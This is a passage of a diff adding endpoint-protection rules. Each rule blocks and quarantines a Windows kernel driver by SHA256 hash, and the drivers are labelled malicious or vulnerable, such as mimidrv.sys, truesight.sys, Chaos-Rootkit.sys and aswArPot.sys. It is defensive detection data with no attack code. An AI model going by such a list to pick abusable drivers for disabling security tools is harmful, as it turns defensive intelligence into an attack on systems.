+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467384Z",
+ "creation_date": "2026-03-23T11:45:30.467388Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467397Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "054c2b8c5e89a2bff72eb6e1169537cf8654b614d9aac1e1e3d8ea02343872fc",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6275493f-2995-52e1-8250-973da5d078ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141962Z",
+ "creation_date": "2026-03-23T11:45:31.141964Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141970Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a47692392fd8128e195aff14fc784abe68a1a0ab43c983d68d97ba63eaeffa55",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6291990d-a3c3-5d13-99dc-4fb5187f8701",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141273Z",
+ "creation_date": "2026-03-23T11:45:31.141275Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3b90be121cea851e54b303e3599331327bfc4bdf71be397ce4615fc9f1d1d5a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6291d7f2-b283-5364-9b02-655693cf92c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143439Z",
+ "creation_date": "2026-03-23T11:45:31.143441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cc281510f92d2770745ad6baaecb6f5afb22e596303c3de07f605fde07acc98",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6297cfc1-c9d2-5da6-975d-7307dc432e35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452432Z",
+ "creation_date": "2026-03-23T11:45:30.452436Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452445Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60fb851ce3da03c319a423979b47a95dd231085d89b26516f3e25164a1a14dfb",
+ "comment": "Vulnerable Kernel Driver (aka Chaos-Rootkit.sys) [https://www.loldrivers.io/drivers/abcd2c10-1078-4cf9-b320-04ca38d22f98/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62b92fb7-3905-5592-ba6b-d9a817aeacda",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825942Z",
+ "creation_date": "2026-03-23T11:45:31.825944Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825958Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b4bc6684efbaa77e2468395c15a26a4b705bbdc9b3d791813ce37efa72c8268a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62c454d7-3db4-577a-a6a5-f22be690a0be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489677Z",
+ "creation_date": "2026-03-23T11:45:31.489680Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489688Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a59a3bbad423479b34158025455d1506d399cc94f3d9b29f85cc5424bc8c73fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62dc498f-7951-5c85-b89e-a23ec03ad09b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983613Z",
+ "creation_date": "2026-03-23T11:45:29.983615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983620Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07b6d69bafcfd767f1b63a490a8843c3bb1f8e1bbea56176109b5743c8f7d357",
+ "comment": "Vulnerable Kernel Driver (aka HOSTNT.sys) [https://www.loldrivers.io/drivers/e42cd285-4dda-4086-a696-93ab1d6f17ca/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62e14f51-4c72-5c3c-ada0-baf238bdca90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985702Z",
+ "creation_date": "2026-03-23T11:45:29.985704Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985710Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ca42465bf4101ff63117c171cb31204dd29c45ba4ea7c31fd950f17e19b5d03",
+ "comment": "Malicious Kernel Driver related to WINTAPIX (aka WinTapix.sys and SRVNET2.SYS) [https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62e18c77-215a-5baf-b881-f8f709e89d76",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826048Z",
+ "creation_date": "2026-03-23T11:45:31.826050Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826055Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "015d63812a826ba39fc54f00ce6846e38fa82acd09a57adb8c7d69027bc3f327",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62e74a68-1ad5-5c86-8066-9159dea9b778",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479571Z",
+ "creation_date": "2026-03-23T11:45:31.479575Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f9071c4b299e0f415811c49f492ce5190ecfd13181632691c1ba16c26425b57",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62f9562b-307e-591a-b51f-8423f70fcc39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619285Z",
+ "creation_date": "2026-03-23T11:45:29.619287Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619293Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "074ae477c8c7ae76c6f2b0bf77ac17935a8e8ee51b52155d2821d93ab30f3761",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62ff5df5-c04f-5561-bb6c-63f2507b97d2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605064Z",
+ "creation_date": "2026-03-23T11:45:29.605066Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605071Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ee2a56c1592ff0e951b452c0de064eba05b7c98e3add04c8aa3b4a84eb797a5",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62ff6ed8-2af5-5924-b008-9c059455d7d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826603Z",
+ "creation_date": "2026-03-23T11:45:30.826605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826611Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb4fce8163c75e9263e2baa7105ebbfb32f1f8b141c4d2a95ec7fa9411c63c05",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63146c7f-05ed-575a-aa4d-d5e7bfa85cd4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826746Z",
+ "creation_date": "2026-03-23T11:45:30.826748Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826754Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ee96c28735bd6a839f15a13e6ca30692a286f5aacd4aa994016ec31d2f73ae1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6315dbe4-5515-5d7e-91d8-2bd5ceb1751a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814519Z",
+ "creation_date": "2026-03-23T11:45:31.814522Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fc71b587095b255d48da485d290ab83c2d170fb2b930ba6ebe5019b90ed7be01",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "632cc686-f655-5f96-af47-d63cc6318254",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495041Z",
+ "creation_date": "2026-03-23T11:45:31.495043Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495048Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "68aff67d444cb49461384ccc104fefe41c827cf6eda6bec30666cff7f2e72e0d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "632ce104-ff31-5975-901f-878a3a15d3ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828437Z",
+ "creation_date": "2026-03-23T11:45:30.828439Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828444Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a1d2d98a6661b8752d1ad3679eb98928af3a110f83444356d089aa2e82161b54",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "632f3abf-ef42-5302-a829-9e61dfa36a91",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490261Z",
+ "creation_date": "2026-03-23T11:45:31.490263Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490269Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b286f4ddd11441738d5992b8da3e94fdc2f815d9dfea17aec5eb9dedce8cf2a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63405bc0-80a7-5a87-89bd-48fec8c7269a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835772Z",
+ "creation_date": "2026-03-23T11:45:30.835774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835780Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e689ee12e6c00fc50a016040b0f4806ef873cc8792c0f43aa8c863a7a9d49b1b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6340b655-3f43-57e1-a258-75c16a07c83b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969347Z",
+ "creation_date": "2026-03-23T11:45:29.969349Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969354Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ebe2e9ec6d5d94c2d58fbcc9d78c5f0ee7a2f2c1aed6d1b309f383186d11dfa3",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "634274e0-4460-5d76-9d0f-07963ff5083c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831439Z",
+ "creation_date": "2026-03-23T11:45:30.831442Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831447Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b34989a6982c798ad8435fdc075ea340ad2a081059c9f11d0454f3bc37231992",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6348c5b1-cde3-5acd-9095-20318a5aac43",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619212Z",
